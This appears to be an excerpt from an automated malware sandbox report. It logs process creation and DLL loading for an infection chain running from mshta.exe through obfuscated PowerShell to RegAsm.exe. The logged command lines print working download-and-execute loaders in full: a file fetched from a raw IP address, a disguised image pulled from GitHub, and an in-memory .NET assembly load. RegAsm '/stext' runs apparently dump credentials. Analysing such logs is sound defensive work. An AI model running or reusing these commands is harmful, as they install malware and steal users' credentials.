                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwva"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xsnewtbsktv"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.ExeJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS" Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE985.tmp" "c:\Users\user\AppData\Local\Temp\1nlzjhnh\CSC4E5E770DE006429A8ABEBD72CF3EF132.TMP"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwva"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xsnewtbsktv"
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
